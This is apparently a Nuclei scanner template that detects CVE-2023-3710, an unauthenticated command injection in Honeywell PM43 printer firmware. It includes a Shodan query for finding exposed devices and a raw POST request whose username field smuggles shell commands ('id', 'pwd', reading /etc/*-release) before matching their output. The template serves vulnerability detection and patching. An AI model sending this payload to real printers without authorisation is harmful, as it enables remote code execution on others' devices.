id: CVE-2023-3710 info: name: Honeywell PM43 Printers - Command Injection author: win3zz severity: critical description: | Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006) reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-3710 - https://github.com/vpxuser/CVE-2023-3710-POC - https://twitter.com/win3zz/status/1713451282344853634 - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004 - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3710 cwe-id: CWE-20,CWE-77 epss-score: 0.70301 epss-percentile: 0.97662 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: honeywell product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" tags: cve,cve2023,honeywell,pm43,printer,iot,rce http: - raw: - | POST /loadfile.lp?pageid=Configure HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1 matchers-condition: and matchers: - type: regex part: body regex: - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)' - type: word part: body words: - 'Release date' - type: status status: - 200 # digest: 4a0a0047304502203505f50a15ed5a15a384ae03ef58343f36abb4bf3acfadd3d66fa50282677b5d022100badbcfda36b6e38bc744c0397b5eb722d93c01edb35d848b0e74d8ef1c0ec662:922c64590222798bb761d5b6d8e72950